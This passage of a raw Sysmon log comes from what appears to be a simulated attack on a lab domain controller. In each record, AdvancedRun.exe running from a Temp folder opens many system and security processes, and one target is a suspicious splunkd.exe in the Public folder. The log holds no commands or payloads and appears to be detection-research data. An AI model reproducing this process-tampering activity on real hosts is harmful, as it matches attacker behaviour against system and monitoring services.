\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009380Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004009375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004009370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:41:37.741{834264DD-FE61-61EA-B605-000000002702}3044972C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)AT